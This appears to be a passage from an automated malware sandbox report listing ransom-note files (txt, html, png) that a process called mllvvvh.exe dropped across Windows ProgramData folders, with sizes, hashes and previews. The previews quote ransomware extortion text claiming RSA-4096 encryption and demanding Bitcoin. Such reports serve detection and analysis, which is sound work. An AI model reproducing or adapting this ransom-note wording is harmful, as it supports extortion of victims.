                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Config\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Config\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Config\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
